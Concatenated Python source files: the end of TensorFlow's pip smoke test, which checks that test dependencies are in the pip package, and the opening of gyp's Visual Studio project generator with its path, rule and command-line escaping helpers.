"//tensorflow/lite/experimental/examples/lstm:rnn_cell.py",
"//tensorflow/lite/experimental/examples/lstm:unidirectional_sequence_lstm_test", # pylint:disable=line-too-long
"//tensorflow/lite/experimental/examples/lstm:unidirectional_sequence_lstm_test.py", # pylint:disable=line-too-long
"//tensorflow/lite/python:interpreter",
"//tensorflow/lite/python:interpreter_test",
"//tensorflow/lite/python:interpreter.py",
"//tensorflow/lite/python:interpreter_test.py",
]
def main():
"""This script runs the pip smoke test.
Raises:
RuntimeError: If any dependencies for py_tests exist in subSet
Prerequisites:
1. Bazel is installed.
2. Running in github repo of tensorflow.
3. Configure has been run.
"""
# pip_package_dependencies_list is the list of included files in pip packages
pip_package_dependencies = subprocess.check_output(
["bazel", "cquery", PIP_PACKAGE_QUERY_EXPRESSION])
if isinstance(pip_package_dependencies, bytes):
pip_package_dependencies = pip_package_dependencies.decode("utf-8")
pip_package_dependencies_list = pip_package_dependencies.strip().split("\n")
pip_package_dependencies_list = [
x.split()[0] for x in pip_package_dependencies_list
]
print("Pip package superset size: %d" % len(pip_package_dependencies_list))
# tf_py_test_dependencies is the list of dependencies for all python
# tests in tensorflow
tf_py_test_dependencies = subprocess.check_output(
["bazel", "cquery", PY_TEST_QUERY_EXPRESSION])
if isinstance(tf_py_test_dependencies, bytes):
tf_py_test_dependencies = tf_py_test_dependencies.decode("utf-8")
tf_py_test_dependencies_list = tf_py_test_dependencies.strip().split("\n")
tf_py_test_dependencies_list = [
x.split()[0] for x in tf_py_test_dependencies.strip().split("\n")
]
print("Pytest dependency subset size: %d" % len(tf_py_test_dependencies_list))
missing_dependencies = []
# File extensions and endings to ignore
ignore_extensions = [
"_test", "_test.py", "_test_gpu", "_test_gpu.py", "_test_lib"
]
ignored_files_count = 0
denylisted_dependencies_count = len(DEPENDENCY_DENYLIST)
# Compare dependencies
for dependency in tf_py_test_dependencies_list:
if dependency and dependency.startswith("//tensorflow"):
ignore = False
# Ignore extensions
if any(dependency.endswith(ext) for ext in ignore_extensions):
ignore = True
ignored_files_count += 1
# Check if the dependency is in the pip package, the dependency denylist,
# or should be ignored because of its file extension.
if not (ignore or dependency in pip_package_dependencies_list or
dependency in DEPENDENCY_DENYLIST):
missing_dependencies.append(dependency)
print("Ignored files count: %d" % ignored_files_count)
print("Denylisted dependencies count: %d" % denylisted_dependencies_count)
if missing_dependencies:
print("Missing the following dependencies from pip_packages:")
for missing_dependency in missing_dependencies:
print("\nMissing dependency: %s " % missing_dependency)
print("Affected Tests:")
rdep_query = ("rdeps(kind(py_test, %s), %s)" %
(" + ".join(PYTHON_TARGETS), missing_dependency))
affected_tests = subprocess.check_output(["bazel", "cquery", rdep_query])
affected_tests_list = affected_tests.split("\n")[:-2]
print("\n".join(affected_tests_list))
raise RuntimeError("""
One or more added test dependencies are not in the pip package.
If these test dependencies need to be in TensorFlow pip package, please add them to //tensorflow/tools/pip_package/BUILD.
Else add no_pip tag to the test.""")
else:
print("TEST PASSED")
if __name__ == "__main__":
main()
| sarvex/tensorflow | tensorflow/tools/pip_package/pip_smoke_test.py | Python | apache-2.0 | 7,387 |
#!/usr/bin/python
# Copyright (c) 2011 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import copy
import ntpath
import os
import posixpath
import re
import subprocess
import sys
import gyp.common
import gyp.easy_xml as easy_xml
import gyp.MSVSNew as MSVSNew
import gyp.MSVSProject as MSVSProject
import gyp.MSVSSettings as MSVSSettings
import gyp.MSVSToolFile as MSVSToolFile
import gyp.MSVSUserFile as MSVSUserFile
import gyp.MSVSVersion as MSVSVersion
# Regular expression for validating Visual Studio GUIDs. If the GUID
# contains lowercase hex letters, MSVS will be fine. However,
# IncrediBuild BuildConsole will parse the solution file, but then
# silently skip building the target causing hard to track down errors.
# Note that this only happens with the BuildConsole, and does not occur
# if IncrediBuild is executed from inside Visual Studio. This regex
# validates that the string looks like a GUID with all uppercase hex
# letters.
VALID_MSVS_GUID_CHARS = re.compile('^[A-F0-9\-]+$')
generator_default_variables = {
'EXECUTABLE_PREFIX': '',
'EXECUTABLE_SUFFIX': '.exe',
'STATIC_LIB_PREFIX': '',
'SHARED_LIB_PREFIX': '',
'STATIC_LIB_SUFFIX': '.lib',
'SHARED_LIB_SUFFIX': '.dll',
'INTERMEDIATE_DIR': '$(IntDir)',
'SHARED_INTERMEDIATE_DIR': '$(OutDir)/obj/global_intermediate',
'OS': 'win',
'PRODUCT_DIR': '$(OutDir)',
# TODO(jeanluc) The way we currently generate libraries makes Visual
# Studio 2010 unhappy. We get a lot of warnings like:
# warning MSB8012: TargetPath(...\Debug\gles2_c_lib.lib) does not match
# the Library's OutputFile property value (...\Debug\lib\gles2_c_lib.lib).
# This may cause your project to build incorrectly. To correct this,
# please make sure that $(OutDir), $(TargetName) and $(TargetExt) property
# values match the value specified in %(Lib.OutputFile).
# Despite the warnings, this compile correctly. It would be nice to get rid
# of the warnings.
# TODO(jeanluc) I had: 'LIB_DIR': '$(OutDir)lib',
'LIB_DIR': '$(OutDir)/lib',
'RULE_INPUT_ROOT': '$(InputName)',
'RULE_INPUT_DIRNAME': '$(InputDir)',
'RULE_INPUT_EXT': '$(InputExt)',
'RULE_INPUT_NAME': '$(InputFileName)',
'RULE_INPUT_PATH': '$(InputPath)',
'CONFIGURATION_NAME': '$(ConfigurationName)',
}
# The msvs specific sections that hold paths
generator_additional_path_sections = [
'msvs_cygwin_dirs',
'msvs_props',
]
generator_additional_non_configuration_keys = [
'msvs_cygwin_dirs',
'msvs_cygwin_shell',
'msvs_shard',
'msvs_strip_hierarchy',
]
# List of precompiled header related keys.
precomp_keys = [
'msvs_precompiled_header',
'msvs_precompiled_source',
]
cached_username = None
cached_domain = None
# TODO(gspencer): Switch the os.environ calls to be
# win32api.GetDomainName() and win32api.GetUserName() once the
# python version in depot_tools has been updated to work on Vista
# 64-bit.
def _GetDomainAndUserName():
if sys.platform not in ('win32', 'cygwin'):
return ('DOMAIN', 'USERNAME')
global cached_username
global cached_domain
if not cached_domain or not cached_username:
domain = os.environ.get('USERDOMAIN')
username = os.environ.get('USERNAME')
if not domain or not username:
call = subprocess.Popen(['net', 'config', 'Workstation'],
stdout=subprocess.PIPE)
config = call.communicate()[0]
username_re = re.compile('^User name\s+(\S+)', re.MULTILINE)
username_match = username_re.search(config)
if username_match:
username = username_match.group(1)
domain_re = re.compile('^Logon domain\s+(\S+)', re.MULTILINE)
domain_match = domain_re.search(config)
if domain_match:
domain = domain_match.group(1)
cached_domain = domain
cached_username = username
return (cached_domain, cached_username)
fixpath_prefix = None
def _NormalizedSource(source):
"""Normalize the path.
But not if that gets rid of a variable, as this may expand to something
larger than one directory.
Arguments:
source: The path to be normalize.d
Returns:
The normalized path.
"""
normalized = os.path.normpath(source)
if source.count('$') == normalized.count('$'):
source = normalized
return source
def _FixPath(path):
"""Convert paths to a form that will make sense in a vcproj file.
Arguments:
path: The path to convert, may contain / etc.
Returns:
The path with all slashes made into backslashes.
"""
if fixpath_prefix and path and not os.path.isabs(path) and not path[0] == '$':
path = os.path.join(fixpath_prefix, path)
path = path.replace('/', '\\')
path = _NormalizedSource(path)
if path and path[-1] == '\\':
path = path[:-1]
return path
def _FixPaths(paths):
"""Fix each of the paths of the list."""
return [_FixPath(i) for i in paths]
def _DoConvertSourcesToFilterRecurse(result, sources, prefix, excluded,
layers_to_strip):
if layers_to_strip < 0:
layers_to_strip = 0
excluded_result = []
folders = dict()
# Gather files into the final result, excluded, or folders.
for s in sources:
if len(s) == 1:
filename = _NormalizedSource('\\'.join(prefix + s))
if filename in excluded:
excluded_result.append(filename)
else:
result.append(filename)
else:
if not folders.get(s[0]):
folders[s[0]] = []
folders[s[0]].append(s[1:])
# Add a folder for excluded files.
if excluded_result:
excluded_folder = MSVSProject.Filter('_excluded_files',
contents=excluded_result)
result.append(excluded_folder)
# Populate all the folders.
for f in folders:
contents = []
_DoConvertSourcesToFilterRecurse(contents, folders[f],
prefix=prefix + [f],
excluded=excluded,
layers_to_strip=layers_to_strip-1)
if layers_to_strip == 0:
contents = MSVSProject.Filter(f, contents=contents)
result.append(contents)
else:
result += contents
#print "layers_to_strip %d result: %s" % (layers_to_strip, result)
def _ConvertSourcesToFilterHierarchy(sources, prefix=None, excluded=None,
layers_to_strip = 0):
"""Converts a list split source file paths into a vcproj folder hierarchy.
Arguments:
sources: A list of source file paths split.
prefix: A list of source file path layers meant to apply to each of sources.
excluded: A set of excluded files.
Returns:
A hierarchy of filenames and MSVSProject.Filter objects that matches the
layout of the source tree.
For example:
_ConvertSourcesToFilterHierarchy([['a', 'bob1.c'], ['b', 'bob2.c']],
prefix=['joe'])
-->
[MSVSProject.Filter('a', contents=['joe\\a\\bob1.c']),
MSVSProject.Filter('b', contents=['joe\\b\\bob2.c'])]
"""
if not prefix: prefix = []
result = []
_DoConvertSourcesToFilterRecurse(result, sources, prefix, excluded,
layers_to_strip)
return result
# print "_ConvertSourcesToFilterHierarchy: sources=%s, prefix=%s, excluded=%s" % (sources, prefix, excluded)
def _ToolAppend(tools, tool_name, setting, value, only_if_unset=False):
if not value: return
# TODO(bradnelson): ugly hack, fix this more generally!!!
if 'Directories' in setting or 'Dependencies' in setting:
if type(value) == str:
value = value.replace('/', '\\')
else:
value = [i.replace('/', '\\') for i in value]
if not tools.get(tool_name):
tools[tool_name] = dict()
tool = tools[tool_name]
if tool.get(setting):
if only_if_unset: return
if type(tool[setting]) == list:
tool[setting] += value
else:
raise TypeError(
'Appending "%s" to a non-list setting "%s" for tool "%s" is '
'not allowed, previous value: %s' % (
value, setting, tool_name, str(tool[setting])))
else:
tool[setting] = value
def _ConfigPlatform(config_data):
return config_data.get('msvs_configuration_platform', 'Win32')
def _ConfigBaseName(config_name, platform_name):
if config_name.endswith('_' + platform_name):
return config_name[0:-len(platform_name)-1]
else:
return config_name
def _ConfigFullName(config_name, config_data):
platform_name = _ConfigPlatform(config_data)
return '%s|%s' % (_ConfigBaseName(config_name, platform_name), platform_name)
def _BuildCommandLineForRuleRaw(spec, cmd, cygwin_shell, fix_paths,
has_input_path, quote_cmd):
if [x for x in cmd if '$(InputDir)' in x]:
input_dir_preamble = (
'set INPUTDIR=$(InputDir)\n'
'set INPUTDIR=%INPUTDIR:$(ProjectDir)=%\n'
'set INPUTDIR=%INPUTDIR:~0,-1%\n'
)
else:
input_dir_preamble = ''
if cygwin_shell:
# Find path to cygwin.
cygwin_dir = _FixPath(spec.get('msvs_cygwin_dirs', ['.'])[0])
# Prepare command.
direct_cmd = cmd
direct_cmd = [i.replace('$(IntDir)',
'`cygpath -m "${INTDIR}"`') for i in direct_cmd]
direct_cmd = [i.replace('$(OutDir)',
'`cygpath -m "${OUTDIR}"`') for i in direct_cmd]
direct_cmd = [i.replace('$(InputDir)',
'`cygpath -m "${INPUTDIR}"`') for i in direct_cmd]
if has_input_path:
direct_cmd = [i.replace('$(InputPath)',
'`cygpath -m "${INPUTPATH}"`')
for i in direct_cmd]
direct_cmd = ['"%s"' % i for i in direct_cmd]
direct_cmd = [i.replace('"', '\\"') for i in direct_cmd]
#direct_cmd = gyp.common.EncodePOSIXShellList(direct_cmd)
direct_cmd = ' '.join(direct_cmd)
# TODO(quote): regularize quoting path names throughout the module
cmd = (
'call "$(ProjectDir)%(cygwin_dir)s\\setup_env.bat" && '
'set CYGWIN=nontsec&& ')
if direct_cmd.find('NUMBER_OF_PROCESSORS') >= 0:
cmd += 'set /a NUMBER_OF_PROCESSORS_PLUS_1=%%NUMBER_OF_PROCESSORS%%+1&& '
if direct_cmd.find('INTDIR') >= 0:
cmd += 'set INTDIR=$(IntDir)&& '
if direct_cmd.find('OUTDIR') >= 0:
cmd += 'set OUTDIR=$(OutDir)&& '
if has_input_path and direct_cmd.find('INPUTPATH') >= 0:
cmd += 'set INPUTPATH=$(InputPath) && '
cmd += 'bash -c "%(cmd)s"'
cmd = cmd % {'cygwin_dir': cygwin_dir,
'cmd': direct_cmd}
return input_dir_preamble + cmd
else:
#print "_BuildCommandLineForRuleRaw: cmd %s" % cmd
# Convert cat --> type to mimic unix.
# if cmd[0] == 'cat':
# command = ['type']
# else:
# if fix_paths:
# command = [cmd[0].replace('/', '\\')]
# else:
# command = [cmd[0]]
# Fix the paths
new_cmd = []
for c in cmd:
words = []
for w in c.split(' '):
# If the argument starts with a slash, it's probably a command
# line switch, otherwise fix the path
if not w.startswith('/'):
w = _FixPath(w)
w.replace('$(InputDir)','%INPUTDIR%')
words.append(w)
c = ' '.join(words)
new_cmd.append(c)
command = [new_cmd[0]]
arguments = new_cmd[1:]
if quote_cmd:
# Support a mode for using cmd directly.
# Convert any paths to native form (first element is used directly).
# TODO(quote): regularize quoting path names throughout the module
arguments = ['"%s"' % i for i in arguments]
# Collapse into a single command.
return input_dir_preamble + ' '.join(command + arguments)
def _BuildCommandLineForRule(spec, rule, has_input_path):
# Find path to cygwin.
cygwin_dir = _FixPath(spec.get('msvs_cygwin_dirs', ['.'])[0])
# Currently this weird argument munging is used to duplicate the way a
# python script would need to be run as part of the chrome tree.
# Eventually we should add some sort of rule_default option to set this
# per project. For now the behavior chrome needs is the default.
mcs = rule.get('msvs_cygwin_shell')
if mcs is None:
mcs = int(spec.get('msvs_cygwin_shell', 1))
elif isinstance(mcs, str):
mcs = int(mcs)
fix_paths = int(rule.get('msvs_fix_action_paths', 1))
quote_cmd = int(rule.get('msvs_quote_cmd', 1))
return _BuildCommandLineForRuleRaw(spec, rule['action'], mcs, fix_paths,
has_input_path, quote_cmd)
def _AddActionStep(actions_dict, inputs, outputs, description, command, config):
"""Merge action into an existing list of actions.
Care must be taken so that actions which have overlapping inputs either don't
get assigned to the same input, or get collapsed into one.
Arguments:
actions_dict: dictionary keyed on input name, which maps to a list of
dicts describing the actions attached to that input file.
inputs: list of inputs
outputs: list of outputs
description: description of the action
command: command line to execute
"""
# Require there to be at least one input (call sites will ensure this).
assert inputs
action = {
'inputs': inputs,
'outputs': outputs,
'description': description,
'command': command,
}
# Pick where to stick this action.
# While less than optimal in terms of build time, attach them to the first
# input for now.
chosen_input = inputs[0]
# Add it there.
config_actions_dict = actions_dict[config]
if chosen_input not in config_actions_dict:
config_actions_dict[chosen_input] = []
config_actions_dict[chosen_input].append(action)
def _AddCustomBuildToolForMSVS(p, spec, primary_input,
inputs, outputs, description, cmd, config):
"""Add a custom build tool to execute something.
Arguments:
p: the target project
spec: the target project dict
primary_input: input file to attach the build tool to
inputs: list of inputs
outputs: list of outputs
description: description of the action
cmd: command line to execute
config: configuration to add it to
"""
inputs = _FixPaths(inputs)
outputs = _FixPaths(outputs)
#print "Adding custom cmd: %s" % cmd
tool = MSVSProject.Tool(
'VCCustomBuildTool',
{'Description': description,
'AdditionalDependencies': ';'.join(inputs),
'Outputs': ';'.join(outputs),
'CommandLine': cmd
})
# Add to the properties of primary input for each config.
c_data = spec['configurations'][config]
p.AddFileConfig(_FixPath(primary_input),
_ConfigFullName(config, c_data), tools=[tool])
def _AddAccumulatedActionsToMSVS(p, spec, actions_dict):
"""Add actions accumulated into an actions_dict, merging as needed.
Arguments:
p: the target project
spec: the target project dict
actions_dict: dictionary keyed on input name, which maps to a list of
dicts describing the actions attached to that input file.
"""
for config in actions_dict:
#print "_AddAccumulatedActionsToMSVS: config %s" % config
config_actions_dict = actions_dict[config]
for primary_input in config_actions_dict:
inputs = set()
outputs = set()
descriptions = []
commands = []
for action in config_actions_dict[primary_input]:
inputs.update(set(action['inputs']))
outputs.update(set(action['outputs']))
descriptions.append(action['description'])
commands.append(action['command'])
# Add the custom build step for one input file.
description = ', and also '.join(descriptions)
command = '\r\n'.join(commands)
_AddCustomBuildToolForMSVS(p, spec,
primary_input=primary_input,
inputs=inputs,
outputs=outputs,
description=description,
cmd=command,
config=config)
def _RuleExpandPath(path, input_file):
"""Given the input file to which a rule applied, string substitute a path.
Arguments:
path: a path to string expand
input_file: the file to which the rule applied.
Returns:
The string substituted path.
"""
path = path.replace('$(InputName)',
os.path.splitext(os.path.split(input_file)[1])[0])
path = path.replace('$(InputDir)', os.path.dirname(input_file))
path = path.replace('$(InputExt)',
os.path.splitext(os.path.split(input_file)[1])[1])
path = path.replace('$(InputFileName)', os.path.split(input_file)[1])
path = path.replace('$(InputPath)', input_file)
return path
def _FindRuleTriggerFiles(rule, sources):
"""Find the list of files which a particular rule applies to.
Arguments:
rule: the rule in question
sources: the set of all known source files for this project
Returns:
The list of sources that trigger a particular rule.
"""
rule_ext = rule['extension']
return [s for s in sources if s.endswith('.' + rule_ext)]
def _RuleInputsAndOutputs(rule, trigger_file):
"""Find the inputs and outputs generated by a rule.
Arguments:
rule: the rule in question.
trigger_file: the main trigger for this rule.
Returns:
The pair of (inputs, outputs) involved in this rule.
"""
raw_inputs = _FixPaths(rule.get('inputs', []))
raw_outputs = _FixPaths(rule.get('outputs', []))
inputs = set()
outputs = set()
inputs.add(trigger_file)
for i in raw_inputs:
inputs.add(_RuleExpandPath(i, trigger_file))
for o in raw_outputs:
outputs.add(_RuleExpandPath(o, trigger_file))
return (inputs, outputs)
def _GenerateNativeRulesForMSVS(p, rules, output_dir, spec, options):
"""Generate a native rules file.
Arguments:
p: the target project
rules: the set of rules to include
output_dir: the directory in which the project/gyp resides
spec: the project dict
options: global generator options
"""
rules_filename = '%s%s.rules' % (spec['target_name'],
options.suffix)
rules_file = MSVSToolFile.Writer(os.path.join(output_dir, rules_filename),
spec['target_name'])
# Add each rule.
for r in rules:
rule_name = r['rule_name']
rule_ext = r['extension']
inputs = _FixPaths(r.get('inputs', []))
outputs = _FixPaths(r.get('outputs', []))
cmd = _BuildCommandLineForRule(spec, r, has_input_path=True)
rules_file.AddCustomBuildRule(name=rule_name,
description=r.get('message', rule_name),
extensions=[rule_ext],
additional_dependencies=inputs,
outputs=outputs,
cmd=cmd)
# Write out rules file.
rules_file.WriteIfChanged()
# Add rules file to project.
p.AddToolFile(rules_filename)
def _Cygwinify(path):
path = path.replace('$(OutDir)', '$(OutDirCygwin)')
path = path.replace('$(IntDir)', '$(IntDirCygwin)')
return path
def _GenerateExternalRules(rules, output_dir, spec,
sources, options, actions_to_add):
"""Generate an external makefile to do a set of rules.
Arguments:
rules: the list of rules to include
output_dir: path containing project and gyp files
spec: project specification data
sources: set of sources known
options: global generator options
actions_to_add: The list of actions we will add to.
"""
filename = '%s_rules%s.mk' % (spec['target_name'], options.suffix)
mk_file = gyp.common.WriteOnDiff(os.path.join(output_dir, filename))
# Find cygwin style versions of some paths.
mk_file.write('OutDirCygwin:=$(shell cygpath -u "$(OutDir)")\n')
mk_file.write('IntDirCygwin:=$(shell cygpath -u "$(IntDir)")\n')
# Gather stuff needed to emit all: target.
all_inputs = set()
all_outputs = set()
all_output_dirs = set()
first_outputs = []
for rule in rules:
trigger_files = _FindRuleTriggerFiles(rule, sources)
for tf in trigger_files:
inputs, outputs = _RuleInputsAndOutputs(rule, tf)
all_inputs.update(set(inputs))
all_outputs.update(set(outputs))
# Only use one target from each rule as the dependency for
# 'all' so we don't try to build each rule multiple times.
first_outputs.append(list(outputs)[0])
# Get the unique output directories for this rule.
output_dirs = [os.path.split(i)[0] for i in outputs]
for od in output_dirs:
all_output_dirs.add(od)
first_outputs_cyg = [_Cygwinify(i) for i in first_outputs]
# Write out all: target, including mkdir for each output directory.
mk_file.write('all: %s\n' % ' '.join(first_outputs_cyg))
for od in all_output_dirs:
if od:
mk_file.write('\tmkdir -p `cygpath -u "%s"`\n' % od)
mk_file.write('\n')
# Define how each output is generated.
for rule in rules:
trigger_files = _FindRuleTriggerFiles(rule, sources)
for tf in trigger_files:
# Get all the inputs and outputs for this rule for this trigger file.
inputs, outputs = _RuleInputsAndOutputs(rule, tf)
inputs = [_Cygwinify(i) for i in inputs]
outputs = [_Cygwinify(i) for i in outputs]
# Prepare the command line for this rule.
cmd = [_RuleExpandPath(c, tf) for c in rule['action']]
cmd = ['"%s"' % i for i in cmd]
cmd = ' '.join(cmd)
# Add it to the makefile.
mk_file.write('%s: %s\n' % (' '.join(outputs), ' '.join(inputs)))
mk_file.write('\t%s\n\n' % cmd)
# Close up the file.
mk_file.close()
# Add makefile to list of sources.
sources.add(filename)
# Add a build action to call makefile.
cmd = ['make',
'OutDir=$(OutDir)',
'IntDir=$(IntDir)',
'-j', '${NUMBER_OF_PROCESSORS_PLUS_1}',
'-f', filename]
cmd = _BuildCommandLineForRuleRaw(spec, cmd, True, False, True)
# Insert makefile as 0'th input, so it gets the action attached there,
# as this is easier to understand from in the IDE.
all_inputs = list(all_inputs)
all_inputs.insert(0, filename)
_AddActionStep(actions_to_add,
inputs=_FixPaths(all_inputs),
outputs=_FixPaths(all_outputs),
description='Running %s' % cmd,
command=cmd)
def _EscapeEnvironmentVariableExpansion(s):
"""Escapes % characters.
Escapes any % characters so that Windows-style environment variable
expansions will leave them alone.
See http://connect.microsoft.com/VisualStudio/feedback/details/106127/cl-d-name-text-containing-percentage-characters-doesnt-compile
to understand why we have to do this.
Args:
s: The string to be escaped.
Returns:
The escaped string.
"""
s = s.replace('%', '%%')
return s
quote_replacer_regex = re.compile(r'(\\*)"')
def _EscapeCommandLineArgumentForMSVS(s):
"""Escapes a Windows command-line argument.
So that the Win32 CommandLineToArgv function will turn the escaped result back
into the original string.
See http://msdn.microsoft.com/en-us/library/17w5ykft.aspx
("Parsing C++ Command-Line Arguments") to understand why we have to do
this.
Args:
s: the string to be escaped.
Returns:
the escaped string.
"""
def _Replace(match):
# For a literal quote, CommandLineToArgv requires an odd number of
# backslashes preceding it, and it produces half as many literal backslashes
# (rounded down). So we need to produce 2n+1 backslashes.
return 2 * match.group(1) + '\\"'
# Escape all quotes so that they are interpreted literally.
s = quote_replacer_regex.sub(_Replace, s)
# Now add unescaped quotes so that any whitespace is interpreted literally.
s = '"' + s + '"'
return s
delimiters_replacer_regex = re.compile(r'(\\*)([,;]+)')
def _EscapeVCProjCommandLineArgListItem(s):
"""Escapes command line arguments for MSVS.
The VCProj format stores string lists in a single string using commas and
semi-colons as separators, which must be quoted if they are to be
interpreted literally. However, command-line arguments may already have
quotes, and the VCProj parser is ignorant of the backslash escaping
convention used by CommandLineToArgv, so the command-line quotes and the
VCProj quotes may not be the same quotes. So to store a general
command-line argument in a VCProj list, we need to parse the existing
quoting according to VCProj's convention and quote any delimiters that are
not already quoted by that convention. The quotes that we add will also be
seen by CommandLineToArgv, so if backslashes precede them then we also have
to escape those backslashes according to the CommandLineToArgv
convention.
Args:
s: the string to be escaped.
Returns:
the escaped string.
"""
def _Replace(match):
# For a non-literal quote, CommandLineToArgv requires an even number of
# backslashes preceding it, and it produces half as many literal
# backslashes. So we need to produce 2n backslashes.
return 2 * match.group(1) + '"' + match.group(2) + '"'
segments = s.split('"')
# The unquoted segments are at the even-numbered indices.
for i in range(0, len(segments), 2):
segments[i] = delimiters_replacer_regex.sub(_Replace, segments[i])
# Concatenate back into a single string
s = '"'.join(segments)
if len(segments) % 2 == 0:
# String ends while still quoted according to VCProj's convention. This
# means the delimiter and the next list item that follow this one in the
# .vcproj file will be misinterpreted as part of this item. There is nothing
# we can do about this. Adding an extra quote would correct the problem in
# the VCProj but cause the same problem on the final command-line. Moving
# the item to the end of the list does works, but that's only possible if
# there's only one such item. Let's just warn the user.
print >> sys.stderr, ('Warning: MSVS may misinterpret the odd number of ' +
'quotes in ' + s)
return s
def _EscapeCppDefineForMSVS(s):
"""Escapes a CPP define so that it will reach the compiler unaltered."""
s = _EscapeEnvironmentVariableExpansion(s)
s = _EscapeCommandLineArgumentForMSVS(s)
s = _EscapeVCProjCommandLineArgListItem(s)
return s
quote_replacer_regex2 = re.compile(r'(\\+)"')
def _EscapeCommandLineArgumentForMSBuild(s):
"""Escapes a Windows command-line argument for use by MSBuild."""
def _Replace(match):
return (len(match.group(1))/2*4)*'\\' + '\\"'
# Escape all quotes so that they are interpreted literally.
s = quote_replacer_regex2.sub(_Replace, s)
return s
def _EscapeMSBuildSpecialCharacters(s):
escape_dictionary = {
'%': '%25',
'$': '%24',
'@': '%40',
"'": '%27',
';': '%3B',
'?': '%3F',
'*': '%2A'
}
result = ''.join([escape_dictionary.get(c, c) for c in s])
return result
def _EscapeCppDefineForMSBuild(s):
"""Escapes a CPP define so that it will reach the compiler unaltered."""
s = _EscapeEnvironmentVariableExpansion(s)
s = _EscapeCommandLineArgumentForMSBuild(s)
s = _EscapeMSBuildSpecialCharacters(s)
return s
def _GenerateRulesForMSVS(p, output_dir, options, spec,
sources, excluded_sources,
actions_to_add):
"""Generate all the rules for a particular project.
Arguments:
p: the project
output_dir: directory to emit rules to
options: global options passed to the generator
spec: the specification for this project
sources: the set of all known source files in this project
excluded_sources: the set of sources excluded from normal processing
actions_to_add: deferred list of actions to add in
"""
rules = spec.get('rules', [])
rules_native = [r for r in rules if not int(r.get('msvs_external_rule', 0))]
rules_external = [r for r in rules if int(r.get('msvs_external_rule', 0))]
# Handle rules that use a native rules file.
if rules_native:
_GenerateNativeRulesForMSVS(p, rules_native, output_dir, spec, options)
# Handle external rules (non-native rules).
if rules_external:
_GenerateExternalRules(rules_external, output_dir, spec,
sources, options, actions_to_add)
_AdjustSourcesForRules(rules, sources, excluded_sources)
def _AdjustSourcesForRules(rules, sources, excluded_sources):
# Add outputs generated by each rule (if applicable).
for rule in rules:
# Done if not processing outputs as sources.
if int(rule.get('process_outputs_as_sources', False)):
# Add in the outputs from this rule.
trigger_files = _FindRuleTriggerFiles(rule, sources)
for trigger_file in trigger_files:
inputs, outputs = _RuleInputsAndOutputs(rule, trigger_file)
inputs = set(_FixPaths(inputs))
outputs = set(_FixPaths(outputs))
inputs.remove(_FixPath(trigger_file))
sources.update(inputs)
excluded_sources.update(inputs)
sources.update(outputs)
def _FilterActionsFromExcluded(excluded_sources, actions_to_add):
"""Take inputs with actions attached out of the list of exclusions.
Arguments:
excluded_sources: list of source files not to be built.
actions_to_add: dict of actions keyed on source file they're attached to.
Returns:
excluded_sources with files that have actions attached removed.
"""
must_keep = []
for conf in actions_to_add:
#print "_FilterActionsFromExcluded, config %s" % conf
must_keep +=_FixPaths(actions_to_add[conf].keys())
return [s for s in excluded_sources if s not in must_keep]
def _GetDefaultConfiguration(spec):
return spec['configurations'][spec['default_configuration']]
def _GetGuidOfProject(proj_path, spec):
"""Get the guid for the project.
Arguments:
proj_path: Path of the vcproj or vcxproj file to generate.
spec: The target dictionary containing the properties of the target.
Returns:
the guid.
Raises:
ValueError: if the specified GUID is invalid.
"""
# Pluck out the default configuration.
default_config = _GetDefaultConfiguration(spec)
# Decide the guid of the project.
guid = default_config.get('msvs_guid')
if guid:
if VALID_MSVS_GUID_CHARS.match(guid) is None:
raise ValueError('Invalid MSVS guid: "%s". Must match regex: "%s".' %
(guid, VALID_MSVS_GUID_CHARS.pattern))
guid = '{%s}' % guid
guid = guid or MSVSNew.MakeGuid(proj_path)
return guid
def _GenerateProject(project, options, version):
"""Generates a vcproj file.
Arguments:
project: the MSVSProject object.
options: global generator options.
version: the MSVSVersion object.
"""
default_config = _GetDefaultConfiguration(project.spec)
# Skip emitting anything if told to with msvs_existing_vcproj option.
if default_config.get('msvs_existing_vcproj'):
return
if version.UsesVcxproj():
_GenerateMSBuildProject(project, options, version)
else:
_GenerateMSVSProject(project, options, version)
def _GenerateMSVSProject(project, options, version):
"""Generates a .vcproj file. It may create .rules and .user files too.
Arguments:
project: The project object we will generate the file for.
options: Global options passed to the generator.
version: The VisualStudioVersion object.
"""
spec = project.spec
configurations = spec['configurations']
vcproj_dir = os.path.dirname(project.path)
if vcproj_dir and not os.path.exists(vcproj_dir):
os.makedirs(vcproj_dir)
platforms = _GetUniquePlatforms(spec)
p = MSVSProject.Writer(project.path, version, spec['target_name'],
project.guid, platforms)
# Get directory project file is in.
project_dir = os.path.split(project.path)[0]
gyp_path = _NormalizedSource(project.build_file)
relative_path_of_gyp_file = gyp.common.RelativePath(gyp_path, project_dir)
config_type = _GetMSVSConfigurationType(spec, project.build_file)
for config_name, config in configurations.iteritems():
_AddConfigurationToMSVSProject(p, spec, config_type, config_name, config)
# Prepare list of sources and excluded sources.
gyp_file = os.path.split(project.build_file)[1]
sources, excluded_sources = _PrepareListOfSources(spec, gyp_file)
# Add rules.
actions_to_add = {}
for conf in configurations:
actions_to_add[conf] = {}
_GenerateRulesForMSVS(p, project_dir, options, spec,
sources, excluded_sources,
actions_to_add)
sources, excluded_sources, excluded_idl = (
_AdjustSourcesAndConvertToFilterHierarchy(
spec, options, project_dir, sources, excluded_sources))
#print "_GenerateMSVSProject: sources: %s" % sources
# Add in files.
_VerifySourcesExist(sources, project_dir)
p.AddFiles(sources)
_AddToolFilesToMSVS(p, spec)
_HandlePreCompiledHeaders(p, sources, spec)
for conf in configurations:
_AddActions(actions_to_add, spec, relative_path_of_gyp_file, conf)
_AddCopies(actions_to_add, spec)
_WriteMSVSUserFile(project.path, version, spec)
# NOTE: this stanza must appear after all actions have been decided.
# Don't excluded sources with actions attached, or they won't run.
excluded_sources = _FilterActionsFromExcluded(
excluded_sources, actions_to_add)
_ExcludeFilesFromBeingBuilt(p, spec, excluded_sources, excluded_idl)
_AddAccumulatedActionsToMSVS(p, spec, actions_to_add)
# Write it out.
p.WriteIfChanged()
def _GetUniquePlatforms(spec):
"""Returns the list of unique platforms for this spec, e.g ['win32', ...].
Arguments:
spec: The target dictionary containing the properties of the target.
Returns:
The MSVSUserFile object created.
"""
# Gather list of unique platforms.
platforms = set()
for configuration in spec['configurations']:
platforms.add(_ConfigPlatform(spec['configurations'][configuration]))
platforms = list(platforms)
return platforms
def _CreateMSVSUserFile(proj_path, version, spec):
"""Generates a .user file for the user running this Gyp program.
Arguments:
proj_path: The path of the project file being created. The .user file
